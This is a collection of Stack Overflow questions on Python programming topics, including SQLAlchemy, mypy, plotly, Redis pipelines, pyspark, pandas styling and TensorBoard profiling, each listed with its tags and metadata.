| 7,796,211
|
Update many-to-many table with removed duplicates
|
<p>I have three models: <code>Author</code>, <code>Book</code>, and <code>BookAuthor</code>. The <code>BookAuthor</code> model represents a many-to-many relationship between <code>Author</code> and <code>Book</code>, i.e., a book can have multiple authors and a person can write multiple books.</p>
<p>I need to parse a file of books and store the books, authors, and their relationships in a database. I want to remove any duplicate authors from the <code>Author</code> model when I save these records. Which means that I need to update the relationships in the <code>BookAuthor</code> association object with the deduplicated author IDs.</p>
<p>How would I remove the duplicate authors while preserving the many-to-many relationships between their books?</p>
<p>Here's a minimal reproducible example:</p>
<pre class="lang-py prettyprint-override"><code>from sqlalchemy import ForeignKey, Integer, String, create_engine
from sqlalchemy.orm import DeclarativeBase, Mapped, Session, mapped_column, relationship
import pandas as pd
class Base(DeclarativeBase):
pass
class BookAuthor(Base):
__tablename__ = "book_author"
book_id: Mapped[int] = mapped_column(ForeignKey("book.id"), primary_key=True)
author_id: Mapped[int] = mapped_column(ForeignKey("author.id"), primary_key=True)
book: Mapped["Book"] = relationship(back_populates="authors")
author: Mapped["Author"] = relationship(back_populates="books")
class Book(Base):
__tablename__ = "book"
id: Mapped[int] = mapped_column(primary_key=True)
title: Mapped[str] = mapped_column(String(2048))
authors: Mapped[list["BookAuthor"]] = relationship(back_populates="book")
class Author(Base):
__tablename__ = "author"
id: Mapped[int] = mapped_column(primary_key=True)
first_name: Mapped[str] = mapped_column(String(256))
last_name: Mapped[str] = mapped_column(String(256))
date_of_birth: Mapped[int] = mapped_column(Integer, nullable=True)
date_of_death: Mapped[int] = mapped_column(Integer, nullable=True)
books: Mapped[list["BookAuthor"]] = relationship(back_populates="author")
engine = create_engine("sqlite:///books.db")
Base.metadata.drop_all(engine)
Base.metadata.create_all(engine)
books = [
{
"title": "Good Omens: The Nice and Accurate Prophecies of Agnes Nutter, Witch",
"authors": [
{
"first_name": "Terry",
"last_name": "Pratchett",
"date_of_birth": 1948,
"date_of_death": 2015,
},
{
"first_name": "Neil",
"last_name": "Gaiman",
"date_of_birth": 1960,
"date_of_death": None,
},
],
},
{
"title": "American Gods",
"authors": [
{
"first_name": "Neil",
"last_name": "Gaiman",
"date_of_birth": 1960,
"date_of_death": None,
},
],
},
{
"title": "The Talisman",
"authors": [
{
"first_name": "Stephen",
"last_name": "King",
"date_of_birth": 1947,
"date_of_death": None,
},
{
"first_name": "Peter",
"last_name": "Straub",
"date_of_birth": 1943,
"date_of_death": 2022,
},
],
},
{
"title": "The Shining",
"authors": [
{
"first_name": "Stephen",
"last_name": "King",
"date_of_birth": 1947,
"date_of_death": None,
},
],
},
{
"title": "It",
"authors": [
{
"first_name": "Stephen",
"last_name": "King",
"date_of_birth": 1947,
"date_of_death": None,
},
],
},
]
with Session(engine) as session:
for book in books:
book_db = Book(title=book["title"])
for author in book["authors"]:
author_db = Author(
first_name=author["first_name"],
last_name=author["last_name"],
date_of_birth=author["date_of_birth"],
date_of_death=author["date_of_death"],
)
book_author = BookAuthor(book=book_db, author=author_db)
session.add(book_author)
session.commit()
book_authors = str(
session.query(BookAuthor)
.join(Book)
.join(Author)
.with_entities(
BookAuthor.book_id.label("book_id"),
BookAuthor.author_id.label("author_id"),
Author.first_name,
Author.last_name,
Author.date_of_birth,
Author.date_of_death,
Book.title,
)
)
print(pd.read_sql_query(sql=book_authors, con=engine).to_string(index=False))
</code></pre>
<p>This outputs the following table:</p>
<pre><code>+---------+-----------+-------------------+------------------+----------------------+----------------------+---------------------------------------------------------------------+
| book_id | author_id | author_first_name | author_last_name | author_date_of_birth | author_date_of_death | book_title |
+---------+-----------+-------------------+------------------+----------------------+----------------------+---------------------------------------------------------------------+
| 1 | 1 | Terry | Pratchett | 1948 | 2015.0 | Good Omens: The Nice and Accurate Prophecies of Agnes Nutter, Witch |
| 1 | 2 | Neil | Gaiman | 1960 | | Good Omens: The Nice and Accurate Prophecies of Agnes Nutter, Witch |
| 2 | 3 | Neil | Gaiman | 1960 | | American Gods |
| 3 | 4 | Stephen | King | 1947 | | The Talisman |
| 3 | 5 | Peter | Straub | 1943 | 2022.0 | The Talisman |
| 4 | 6 | Stephen | King | 1947 | | The Shining |
| 5 | 7 | Stephen | King | 1947 | | It |
+---------+-----------+-------------------+------------------+----------------------+----------------------+---------------------------------------------------------------------+
</code></pre>
<p>What I want:</p>
<pre><code>+---------+-----------+-------------------+------------------+----------------------+----------------------+---------------------------------------------------------------------+
| book_id | author_id | author_first_name | author_last_name | author_date_of_birth | author_date_of_death | book_title |
+---------+-----------+-------------------+------------------+----------------------+----------------------+---------------------------------------------------------------------+
| 1 | 1 | Terry | Pratchett | 1948 | 2015.0 | Good Omens: The Nice and Accurate Prophecies of Agnes Nutter, Witch |
| 1 | 2 | Neil | Gaiman | 1960 | | Good Omens: The Nice and Accurate Prophecies of Agnes Nutter, Witch |
| 2 | 2 | Neil | Gaiman | 1960 | | American Gods |
| 3 | 3 | Stephen | King | 1947 | | The Talisman |
| 3 | 4 | Peter | Straub | 1943 | 2022.0 | The Talisman |
| 4 | 3 | Stephen | King | 1947 | | The Shining |
| 5 | 3 | Stephen | King | 1947 | | It |
+---------+-----------+-------------------+------------------+----------------------+----------------------+---------------------------------------------------------------------+
</code></pre>
<p>Duplicate authors are defined as having the same <code>first_name</code>, <code>last_name</code>, <code>date_of_birth</code>, and <code>date_of_death</code> attributes.</p>
<p>Note: I need to avoid Python data structures and delegate most of the work to the database itself. The data source contains millions of records and handling duplicates in a Python list or dictionary would simply consume too much memory.</p>
|
<python><sqlalchemy>
|
2023-05-22 11:27:46
| 0
| 418
|
Thegerdfather
|
76,305,578
| 13,819,183
|
Calling instance of adapter class plugged into port is causing mypy issues
|
<p>I'm currently plugging an Adapter into a port in a handler which can help you get an instance of that port. Here is a simple setup to reproduce:</p>
<pre class="lang-py prettyprint-override"><code>from typing import Protocol
class SomePort(Protocol):
def caller(self):
raise NotImplementedError
class SomeAdapter:
def caller(self):
print("Called")
class SomeController:
@staticmethod
def get_instance(port: SomePort) -> SomePort:
return port()
instance = SomeController.get_instance(port=SomeAdapter)
instance.caller()
</code></pre>
<p>This is working just fine in code but in <code>mypy</code> I'm getting the following issues:</p>
<pre class="lang-bash prettyprint-override"><code>$ mypy --version
mypy 0.931
$ mypy test/test.py
test/test.py:17: error: "SomePort" not callable
test/test.py:20: error: Argument "port" to "get_instance" of "SomeController" has incompatible type "Type[SomeAdapter]"; expected "SomePort"
</code></pre>
<p>anything I've misunderstood here? Running the script prints <code>Called</code> just fine, but mypy is unhappy about the way I've set this up. Any help is appreciated. :)</p>
|
<python><mypy><python-typing><hexagonal-architecture>
|
2023-05-22 11:13:06
| 1
| 1,405
|
Steinn Hauser Magnússon
|
76,305,410
| 8,541,953
|
Ipywidgets appear separated when displaying them
|
<p>I am creating two simple widgets with <code>ipywidget</code> and when displaying them, I need them to be close to each other. However the default is not showing them like this.</p>
<pre><code>import ipywidgets as widgets
label = widgets.Label(value='test:')
checkbox = widgets.Checkbox(indent=False)
float_text = widgets.FloatText()
widgets_box = widgets.HBox([label, checkbox, float_text])
display(widgets_box)
</code></pre>
<p>Why is that? How to i put the Floattext widget just next to the checkbox?</p>
<p><a href="https://i.sstatic.net/EPe5W.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/EPe5W.png" alt="enter image description here" /></a></p>
|
<python><widget><ipywidgets>
|
2023-05-22 10:49:43
| 1
| 1,103
|
GCGM
|
76,305,333
| 18,374,898
|
plotly write_image() runs forever and doesn't produce any static image
|
<h1>Plotly <code>fig.write_image()</code> takes forever</h1>
<h1>and doesn't produce any image</h1>
<p>I'm using</p>
<pre><code>python 3.10.11
Plotly 5.14.1
kaleido 0.2.1
Win 11 22H2
VSCode 1.78.2
</code></pre>
<p>when I try to execute a cell with <code>fig.write_image('filename.png', format = 'png')</code> the cell just runs forever without producing any <code>.png</code> files.</p>
<p>Task manager shows 3 kaleido.exe running processes.</p>
<p>Kaleido is installed to the same directroy as plotly (and other packages)</p>
<p>On the contrary, <code>write_html()</code> works perfectly with the very same graph and saves a <code>.html</code> graph in a second.</p>
<p><strong>Minimally reproducible example:</strong></p>
<pre><code>import plotly.express as px
fig = px.line(x=[0,1,2], y=[0,1,2])
fig.write_image("plot.png", format = 'png', width = 500, height = 500, scale = 1, engine = 'kaleido')
</code></pre>
<p>Similar questions: <a href="https://stackoverflow.com/questions/69016568/unable-to-export-plotly-images-to-png-with-kaleido">1</a>, <a href="https://github.com/plotly/plotly.py/issues/3744" rel="noreferrer">2</a>, <a href="https://stackoverflow.com/questions/73401325/plotly-write-image-freezes-with-kaleido-0-2-1">3</a></p>
<p><strong>Kinda working solution:</strong> downgrading kaleido to <code>version 0.1.0.post1</code> kinda solved the issue,</p>
<p>but is there a way to make kaleido 0.2.1 working?</p>
|
<python><plotly><kaleido>
|
2023-05-22 10:38:33
| 3
| 320
|
Konstantin Z
|
76,305,312
| 4,571,350
|
How to add another label level to the x-axis
|
<p>I am trying to put a secondary axis on a plot. The first x axis display the day of the month. I would like the label of the secondary axis to be the month name and to be displayed below.</p>
<p>For my first axe I have:</p>
<pre><code>plot={}
plot['W']=axs[0]
plot['W'].xaxis.set_major_formatter(mdates.DateFormatter('%d'))
plot['W'].xaxis.set_minor_locator(mdates.HourLocator(interval=6))
plot['W'].xaxis.set_major_locator(mdates.DayLocator(interval=1))
</code></pre>
<p>In the end it should look like that<a href="https://i.sstatic.net/RXF4C.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/RXF4C.png" alt="enter image description here" /></a>:</p>
|
<python><matplotlib><x-axis>
|
2023-05-22 10:36:07
| 1
| 1,365
|
Laetis
|
76,305,257
| 18,108,367
|
The INCRBY instruction executed by a Redis pipeline return a reference to the pipeline instead the value of the key modified
|
<p>I have some problem to use Redis pipeline. I need to execute 2 commands (<code>incr()</code> and <code>set()</code>) by a <em>Redis transaction</em>.</p>
<p><strong>Environment info</strong>: redis-py version 3.5.3; the version of the Redis server is v=5.0.5.</p>
<p>So I have tried to use the following code (the code example is reproducible):</p>
<pre><code>import redis
r = redis.Redis()
pipe = r.pipeline()
def redis_insertion():
pipe.multi()
testIndex = pipe.incr('testIndex')
pipe.set('new_key:' + str(testIndex), 'new_value')
pipe.execute()
pipe.reset()
redis_insertion()
</code></pre>
<p>By Monitor I can see the real commands executed by the redis server:</p>
<pre><code>> redis-cli monitor
OK
1684750490.821375 [0 127.0.0.1:47322] "MULTI"
1684750490.821394 [0 127.0.0.1:47322] "INCRBY" "testIndex" "1"
1684750490.821400 [0 127.0.0.1:47322] "SET" "new_key:Pipeline<ConnectionPool<Connection<host=localhost,port=6379,db=0>>>" "new_value"
1684750490.821411 [0 127.0.0.1:47322] "EXEC"
</code></pre>
<p>The problem is that the instruction <code>pipe.set('new_key:' + str(testIndex), 'new_value')</code> return:</p>
<pre><code>Pipeline<ConnectionPool<Connection<host=localhost,port=6379,db=0>>>
</code></pre>
<p>instead of the value of the key <code>testIndex</code> after the execution of the <code>INCRBY</code> instruction.</p>
<p>Could someone explain me this behaviour?</p>
|
<python><redis><transactions><watch><redis-py>
|
2023-05-22 10:29:07
| 2
| 2,658
|
User051209
|
76,305,034
| 11,452,928
|
How to pass option to python when I'm running a jupyter notebook on VS Code
|
<p>I've created a virtual environment using <code>venv</code> and I'm using such environment in Visual Studio Code to run a jupyter notebook.</p>
<p>Now, my code stops running and from the log I can read 2 warnings: one of which is</p>
<pre><code>warning: It seems that frozen modules are being used, which may
0.00s - make the debugger miss breakpoints. Please pass -Xfrozen_modules=off
0.00s - to python to disable frozen modules.
0.00s - Note: Debugging will proceed. Set PYDEVD_DISABLE_FILE_VALIDATION=1 to disable this validation.
</code></pre>
<p>Let's suppose I want to pass <code>-Xfrozen_modules=off</code> to python to see what happens, how can I do it? I mean: I'm not running python from command line, I'm just pressing Shift+Enter in Visual Studio Code to execute the code cells of my notebook; how can I pass option to python in Visual Studio Code?</p>
|
<python><visual-studio-code>
|
2023-05-22 10:02:24
| 2
| 753
|
fabianod
|
76,305,020
| 1,648,641
|
pyspark dataframe limiting on multiple columns
|
<p>I wonder if anyone point me in the right direction with the following problem. In a rather large pyspark dataframe with about 50 odd columns, two of them represent say 'make' and 'model'. Something like</p>
<pre><code>21234234322(unique id) .. .. .. Nissan Navara .. .. ..
73647364736 .. .. .. BMW X5 .. .. ..
</code></pre>
<p>What I would like to know is what the top 2 models per brand are. I can groupby both columns and add a count no problem, but how do I then limit (or filter) that result? I.e. how do I keep the (up to) 2 most popular models per brand and remove the rest?</p>
<p>Whatever I try, I end up iterating over the brands that exist in the original dataframe manually. Is there another way?</p>
|
<python><pyspark>
|
2023-05-22 10:00:57
| 1
| 1,870
|
Lieuwe
|
76,304,997
| 1,113,579
|
Build a dictionary from an object's explicitly declared fields
|
<p>My table definition:</p>
<pre><code>class AppProperties(base):
__tablename__ = "app_properties"
key = Column(String, primary_key=True, unique=True)
value = Column(String)
</code></pre>
<p>Code for updating an app property:</p>
<pre><code>session = Session()
query = session.query(AppProperties).filter(AppProperties.key == "memory")
new_setting = AppProperties(key="memory", value="1 GB")
query.update(new_setting)
</code></pre>
<p>The line <code>query.update(new_setting)</code> fails because the update method requires an iterable.
If I use <code>query.update(vars(new_setting))</code>, it includes some extra values, which are not there in the underlying table and hence fails.</p>
<p>How can I build this dictionary: <code>{"key": "memory", "value": "1 GB"}</code> using the object <code>new_setting</code>, so that I can call the <code>update</code> method using this dictionary?</p>
<p>For example:</p>
<pre><code>query.update({"key": "memory", "value": "1 GB"})
</code></pre>
<p>Because I already have everything in <code>new_setting</code>, I just need to convert it into a dictionary with only those keys which are explicitly declared in the class definition of <code>AppProperties</code>, without inheriting the fields from the base class or any other scope.</p>
|
<python><sqlalchemy>
|
2023-05-22 09:57:32
| 1
| 1,276
|
AllSolutions
|
76,304,987
| 3,849,662
|
Stacked bar charts with differing x axes
|
<p>I am using matplotlib to create a stacked barchart.</p>
<p>I have multiple arrays to plot but will simplify it to 2 for the sake of this questions.</p>
<pre><code>rates = [4, 4.1, 4.2, 4.3, 4.4, 4.5]
counts = [12, 17, 22, 9, 12, 18]
rates1 = [4.3, 4.4]
counts1 = [24, 17]
</code></pre>
<p>I want to plot a barchart for rates against counts, with the rates1 bar stacked above it.</p>
<p>I am getting an error due to the mismatched size of the arrays.</p>
<p>I believe I need to fill in where the rates are "missing", eg. 4.1, with a zero value. But don't want to hardcode this. I also can't just pad the end of the list with zeroes as then the counts won't align with the correct rate.</p>
|
<python><matplotlib>
|
2023-05-22 09:56:46
| 1
| 773
|
Joe Smart
|
76,304,851
| 1,113,579
|
VSCode Intellisense for SQLAlchemy query result
|
<p>Below is a code fragment for querying a table using SQLAlchemy and reading the first record:</p>
<pre><code>session = Session()
customer = session.query(Customer).filter(Customer.name == "John").first()
customer.age = 50
</code></pre>
<p>In the 3rd line of code <code>customer.age = 50</code>, the VSCode Intellisense does not work, perhaps because VSCode cannot infer what will be the return type of <code>first()</code> method in the previous line.</p>
<p>Is there a way I can use the class cast explicitly or any other workaround, so that the methods and fields of the class <code>Customer</code> become available for its object <code>customer</code> in Intellisense?</p>
<p>EDIT 1:</p>
<p>I have declared class like this:</p>
<pre><code>class Customer(base):
__tablename__ = "customers"
name = Column(String, primary_key=True, unique=True)
age= Column(Float, nullable = False)
</code></pre>
<p>In the VSCode Intellisense, it is showing only the dunder fields of <code>Customer</code>. It is not showing the <code>name</code> and <code>age</code> fields.</p>
<p>Below is the screenshot how it is coming for me in VSCode:</p>
<p><a href="https://i.sstatic.net/zpMTC.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/zpMTC.png" alt="enter image description here" /></a></p>
<p>EDIT 2:</p>
<p>In my VSCode, the following Python related extensions are installed:</p>
<ol>
<li>Pylance</li>
<li>Python</li>
<li>Python Environment Manager</li>
<li>Python Extension Pack</li>
<li>Python Indent</li>
</ol>
|
<python><visual-studio-code><sqlalchemy><intellisense>
|
2023-05-22 09:40:47
| 2
| 1,276
|
AllSolutions
|
76,304,808
| 11,230,924
|
Python regex to match identical city names but formatted differently
|
<p>In a Python regex, I am trying to compare identical city names that are formatted differently (uppercase/lowercase, separated by spaces or hyphens, characters with different cases). For example, "Paris" and "paris", "New York" and "neW-york" should match, but not "Paris" and "New York".</p>
<p>my code :</p>
<pre><code>import re
import unicodedata
class CompareCities:
def __init__(self):
self.city_regex = re.compile(
r"^(([A-Z]+[a-z]*)|([a-z]+[A-Z]*))[ -]?(([A-Z]+[a-z]*)|([a-z]+[A-Z]*))$"
)
def compare(self, city1, city2):
city1_normalized = self._normalize(city1)
city2_normalized = self._normalize(city2)
return city1_normalized == city2_normalized
def _normalize(self, city):
city = (
self.city_regex.match(city).group()
if self.city_regex.match(city)
else False
)
if not city:
return False
city = (
unicodedata.normalize("NFD", city)
.encode("ascii", "ignore")
.decode("utf-8")
.upper()
)
return city
compare_cities = CompareCities()
result = compare_cities.compare("New York", "nEw-yOrk")
if result:
print("same city")
else:
print("not same city")
</code></pre>
<p>the probleme , for example , "New York" and "nEw-yOrk" should match, but not.</p>
<p>thank you for help</p>
|
<python><string><compare>
|
2023-05-22 09:36:07
| 3
| 381
|
Zembla
|
76,304,798
| 7,214,344
|
Finding nearest neighbor pixel from a binary mask
|
<p>I have a matrix and a binary mask. For example:
Matrix is</p>
<pre><code>array([[ 1, 2, 3, 4],
[ 5, 6, 7, 8],
[ 9, 10, 11, 12],
[13, 14, 15, 16]])
</code></pre>
<p>And binary mask is</p>
<pre><code>array([[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 0, 0, 1],
[1, 0, 0, 1]])
</code></pre>
<p>I want to create a new matrix that has original matrix's entries in places where the binary mask is 0, and in nonzero places it should choose the closest element from the zero region. So the required output matrix in the example above is:</p>
<pre><code>array([[10, 10, 11, 11],
[10, 10, 11, 11],
[10, 10, 11, 11],
[14, 14, 15, 15]]).
</code></pre>
<p>Using opencv, I can obtain a matrix of distances for the binary matrix, via the command:</p>
<pre><code>cv2.distanceTransformWithLabels(binary.astype('uint8'),cv2.DIST_L2 ,cv2.DIST_MASK_PRECISE)
</code></pre>
<p>The output of the command is</p>
<pre><code>(array([[2.1968994, 2. , 2. , 2.1968994],
[1.3999939, 1. , 1. , 1.3999939],
[1. , 0. , 0. , 1. ],
[1. , 0. , 0. , 1. ]], dtype=float32),
array([[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1],
[1, 1, 1, 1]], dtype=int32))
</code></pre>
<p>However, it does not return the indices of closest element, only the distances from it (as can be seen in the example above). Any idea how to achieve the desired output using <code>opencv</code> or any other python package?</p>
|
<python><opencv><breadth-first-search><flood-fill>
|
2023-05-22 09:34:42
| 0
| 19,734
|
Miriam Farber
|
76,304,767
| 4,266,314
|
How to retrieve a Hive query as a DataFrame?
|
<p>I want to connect to a Hive database via ODBC using <code>sqlalchemy</code>. I managed to connect and query using <code>pyodbc</code> instead of <code>sqlalchemy</code>. Here is what I've done:</p>
<pre class="lang-py prettyprint-override"><code>import pyodbc
import pandas as pd
cnxn = pyodbc.connect("DSN=my_dsn", autocommit=True)
pd.read_sql("SELECT * FROM database.table LIMIT 10", cnxn)
</code></pre>
<p>This works in principle, but I get this warning:</p>
<blockquote>
<p>UserWarning: pandas only support SQLAlchemy connectable(engine/connection) ordatabase string URI or sqlite3 DBAPI2 connectionother DBAPI2 objects are not tested, please consider using SQLAlchemy</p>
</blockquote>
<p>Thus, I want to switch to <code>sqlalchemy</code>, but the following does not work:</p>
<pre class="lang-py prettyprint-override"><code>from sqlalchemy import create_engine
engine = create_engine(
"mssql+pyodbc://my_dsn",
connect_args={"autocommit": True}
)
pd.read_sql("SELECT * FROM database.table LIMIT 10", engine)
</code></pre>
<blockquote>
<p>AttributeError: 'OptionEngine' object has no attribute 'execute'</p>
</blockquote>
<p>Next attempt:</p>
<pre class="lang-py prettyprint-override"><code>engine.connect()
</code></pre>
<p>Next error:</p>
<blockquote>
<p>Syntax or semantic analysis error thrown in server while executing query. Error message from server: AnalysisException: default.schema_name() unknown for database default. Currently this db has 0 functions.</p>
</blockquote>
<p><strong>How can I connect to my database using <code>sqlalchemy</code>?</strong></p>
<p>Or is there some other easy way to make queries and get the result in form of a DataFrame?</p>
<p><strong>EDIT:</strong>
I'm using Python 3.9.11, sqlalchemy 2.0.12, and pandas 1.4.2.</p>
|
<python><pandas><sqlalchemy><hive><pyodbc>
|
2023-05-22 09:30:46
| 1
| 1,958
|
der_grund
|
76,304,601
| 17,638,206
|
Importing a module from a different path in the same project
|
<p>I have the following project structure :</p>
<pre><code>-project
-src
-package1
-script1.py
-__init__.py
-package2
-script2.py
- __init__.py
-__init__.py
</code></pre>
<p>Now <code>script1.py</code> includes two functions :</p>
<pre><code>def my funct1():
print("Hello")
def my funct2():
// do something
</code></pre>
<p>Now I want to run <code>funct1()</code> in <code>script2.py</code>. I am new to something like that as I always write my whole code in <code>main.py</code> and that's it.
I have searched for this problem and I wrote the following code in <code>script2.py</code> :</p>
<pre><code>from src.package1.script1 import *
funct1()
</code></pre>
<p>This gives me the following error :</p>
<pre><code> from src.package1.script1 import *
ModuleNotFoundError: No module named 'src'
</code></pre>
<p>Somebody please help me to import the function. I have another question, when I solve the import error, do I directly call <code>funct1()</code> in <code>script2.py</code> or do I need to do something extra, like including a main function in <code>script2.py</code> ??</p>
|
<python><python-3.x>
|
2023-05-22 09:10:20
| 1
| 375
|
AAA
|
76,304,449
| 1,497,720
|
TFAutoModelForSeq2SeqLM requires the TensorFlow library but it was not found in your environment
|
<p>For code below:</p>
<pre><code>from transformers import TFAutoModelForSeq2SeqLM, AutoTokenizer
from transformers import pipeline
# Load the pre-trained T5 model and tokenizer
model_checkpoint = "t5-small"
model = TFAutoModelForSeq2SeqLM.from_pretrained(model_checkpoint)
tokenizer = AutoTokenizer.from_pretrained(model_checkpoint)
# Define the summarization function
summarizer = pipeline("summarization", model=model, tokenizer=tokenizer, framework="tf")
summarizer(
"how are you today? this is something remarkable, the sun is from the west",
min_length=1,
max_length=19,
)
</code></pre>
<p>I got the following error:</p>
<pre><code>---------------------------------------------------------------------------
ImportError Traceback (most recent call last)
~\AppData\Local\Temp/ipykernel_37988/4253040799.py in <module>
3 # Load the pre-trained T5 model and tokenizer
4 model_checkpoint = "t5-small"
----> 5 model = TFAutoModelForSeq2SeqLM.from_pretrained(model_checkpoint)
6 tokenizer = AutoTokenizer.from_pretrained(model_checkpoint)
7
C:\ProgramData\Anaconda3\lib\site-packages\transformers\utils\dummy_tf_objects.py in from_pretrained(cls, *args, **kwargs)
262 @classmethod
263 def from_pretrained(cls, *args, **kwargs):
--> 264 requires_backends(cls, ["tf"])
265
266
C:\ProgramData\Anaconda3\lib\site-packages\transformers\file_utils.py in requires_backends(obj, backends)
681 name = obj.__name__ if hasattr(obj, "__name__") else obj.__class__.__name__
682 if not all(BACKENDS_MAPPING[backend][0]() for backend in backends):
--> 683 raise ImportError("".join([BACKENDS_MAPPING[backend][1].format(name) for backend in backends]))
684
685
ImportError:
TFAutoModelForSeq2SeqLM requires the TensorFlow library but it was not found in your environment. Checkout the instructions on the
installation page: https://www.tensorflow.org/install and follow the ones that match your environment.
</code></pre>
<p>How should I solve it?</p>
<p>The result of pip list show that I have tensorflow 2.12.0 installed</p>
<pre><code>tensorflow 2.12.0
</code></pre>
<p>I have seen this <a href="https://stackoverflow.com/questions/70624869/tfbertforsequenceclassification-requires-the-tensorflow-library-but-it-was-not-f">TFBertForSequenceClassification requires the TensorFlow library but it was not found in your environment</a> but neither solution within help.</p>
<p>Update for Alvas:
<a href="https://i.sstatic.net/VFw6F.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/VFw6F.png" alt="enter image description here" /></a></p>
|
<python><python-3.x><tensorflow><huggingface-transformers><transformer-model>
|
2023-05-22 08:49:55
| 1
| 18,765
|
william007
|
76,304,401
| 12,435,792
|
Convert to pd.to_timedelta(unit='m') not working
|
<pre><code>df.loc[i,'time in queue']=datetime.datetime.now()-df.loc[i,'IST DateTime']
actual_time_left=float(sla_dict.get( df.loc[i,'SLA Type'])-df.loc[i,'time in queue'].total_seconds()/60)
df.loc[i,'actual time left']=pd.to_timedelta(actual_time_left,unit='m')
</code></pre>
<p>where,</p>
<pre><code>df.loc[i,'IST DateTime'] = Timestamp('2023-05-22 08:14:00')
sla_dict.get( df.loc[i,'SLA Type']) = 120
actual_time_left = -221.71050316666668
df.loc[i,'actual time left']=Timedelta('-1 days +20:18:17.369809980')
</code></pre>
<p>The IST time was 8:14 AM. The SLA was 120 minutes. This task was supposed to be completed within 120 min. Therefore this PNR was missed by 240 minutes(Approximately) The IST time right now is 2:09 PM.
I want to be able to display the actual time left as = - 04:0:0 (i.e it is up by it's SLA by 4 hours)
How can I do that?</p>
|
<python><pandas><datetime>
|
2023-05-22 08:40:55
| 0
| 331
|
Soumya Pandey
|
76,304,343
| 16,933,406
|
dataframe to excel with styling (background and color)
|
<p>I have a data frame as below and want to apply two conditions for the styling and save into excel.</p>
<p>I could perform either of the condition at a time but not the both simultaneously.</p>
<blockquote>
<p><strong>input:</strong> dataframe (2 colums) and a given_list(index numbers)</p>
<p><strong>condition_1:</strong> [highlight ('background-color: yellow') and red color
('color:red') but if type(column[0])!=int then blue color
('color:blue')] if row.numer in the given_list.</p>
<p><strong>condition_2:</strong> if type(column[0])!=int then blue color ('color:blue')</p>
</blockquote>
<p><strong>data_frame</strong>={
'column0': {0: 1, 1: 2, 2: 3, 3: 4, 4: 5, 5: 6, 6: 7, 7: 8, 8: 9, <strong>9: 10A, 10: 11B, 11: 12C</strong>, 12: 13, 13: 14, 14: 15, 15: 16, 16: 17, 17: 18, <strong>18: 19A, 19: 20B,</strong> 20: 21, 21: 22, 22: 23, 23: 24, 24: 25, 25: 26, 26: 27},
'column1': {0: 'A', 1: 'V', 2: 'T', 3: 'L', 4: 'G', 5: 'E', 6: 'S', 7: 'G', 8: 'G', 9: 'G', 10: 'L', 11: 'Q', 12: 'T', 13: 'P', 14: 'G', 15: 'G', 16: 'G', 17: 'L', 18: 'S', 19: 'L', 20: 'V', 21: 'C', 22: 'K', 23: 'A', 24: 'S', 25: 'G', 26: 'F'}
}</p>
<p><strong>given_list</strong>=[7,8,9,10,11,12,13,14,15,21,22] ### the index numbers of the dataframe</p>
<p><strong>desired_output</strong>:<a href="https://i.sstatic.net/9xxwW.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/9xxwW.png" alt="enter image description here" /></a></p>
<p>What I tried:</p>
<pre><code>def highlight(row, row_index):
# print(type(row[0]))
background_color = 'background-color: yellow'
text_color='color:red'
text_color_1='color:blue'
highlited_rows=[f'{text_color}; {background_color}' if row.name in row_index else (f'{text_color_1}' if not isinstance(row[0], int) else '')for _, cell in enumerate(row)]
highlighted_df =df.style.apply(lambda row: highlight(row, row_index), axis=1)
aligned_df=highlighted_df.set_properties(**{'text-align': 'center'})
aligned_df.to_excel('highlighted_dataframe.xlsx', engine='openpyxl', index=False)
</code></pre>
<p><strong>output</strong>=<a href="https://i.sstatic.net/Kd4LQ.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/Kd4LQ.png" alt="enter image description here" /></a></p>
<p>I am not able to color the txt based on the both condition. How to apply both the conditions simultaneously so I can get the desired output?
Any help will be appreciated.</p>
|
<python><pandas><dataframe><pyexcel>
|
2023-05-22 08:32:30
| 3
| 617
|
shivam
|
76,304,330
| 6,220,759
|
Splitting on a character which should always be at the beginning of a group
|
<p>I would like to split a string based on the following rules:</p>
<ul>
<li>if it contains 0 bullets (•), return the whole string</li>
<li>if it contains 1 or more bullets, return the string up until the bullet, and then a new group starting with each bullet.</li>
</ul>
<p>Example:</p>
<pre><code>"Python is: • Great language • Better than Java • From 1991"
</code></pre>
<p>Should return 4 groups:</p>
<pre><code>["Python is: ", "• Great language ", "• Better than Java ", "• From 1991"]
</code></pre>
<p>I tried using this regex:</p>
<pre><code>re.split('[^•](.+?)[•$]')
</code></pre>
<p>But since the bullet is a boundary, if it finds one match ending in a bullet, it doesn't see the next string as beginning in one.</p>
<p>How can I solve this?</p>
|
<python><regex>
|
2023-05-22 08:31:18
| 0
| 11,757
|
Josh Friedlander
|
76,304,244
| 10,970,202
|
Tensorboard profiler tab not showing anything behind corporate firewall
|
<p>Versions: python3.7, tensorflow 2.9.1, tensorboard 2.9.1, tensorboard-plugin-profile==2.11.2.</p>
<p>tb_callback is passed in as follows</p>
<pre><code>tb_callback = tf.keras.callbacks.TensorBoard(logdir=path_tologdir, histogram_freq=1, profile_batch=(1,5))
model.fit(train_ds, validation_data=valid_ds, callbacks=[tb_callback], epochs=10, verbose=2, use_multiprocessing=True, workers=2)
</code></pre>
<p>This successfully downloads .pb files in <code>path_to_logdir/plugins/profile/datetime/{pb files)</code>
and opening <code>overview_page.pb</code> files using notepad, I can see messages that are about profiling such as <br>
"your program in POTENTIALLY input-bound because n% of the total step time sampled is spent on 'All Others' ..." <br></p>
<p>Therefore following assumption is made, tensorflow successfully profiles its process however tensorboard is unable to read it.</p>
<p>tensorboard is ran as follows</p>
<pre><code>tensorboard --logdir path_to_logdir/ --bind_all
</code></pre>
<p>where I access it from different server. NOTE: model training and tensorboard is ran on same server.</p>
<p>I can see on top right dropdown "profiler" however upon clicking it shows blank page and prints following logs in server that tensorboard is running in:</p>
<pre><code>Illegal Content-Security-Policy for script-src: 'unsafe-inline'
Illegal Content-Security-Policy for script-src-elem: 'unsafe-inline'
</code></pre>
<p>from <a href="https://github.com/tensorflow/profiler" rel="nofollow noreferrer">https://github.com/tensorflow/profiler</a> it says <code>Note: The TensorFlow Profiler requires access to the Internet to load the Google Chart library. Some charts and tables may be missing if you run TensorBoard entirely offline on your local machine, behind a corporate firewall, or in a datacenter.</code></p>
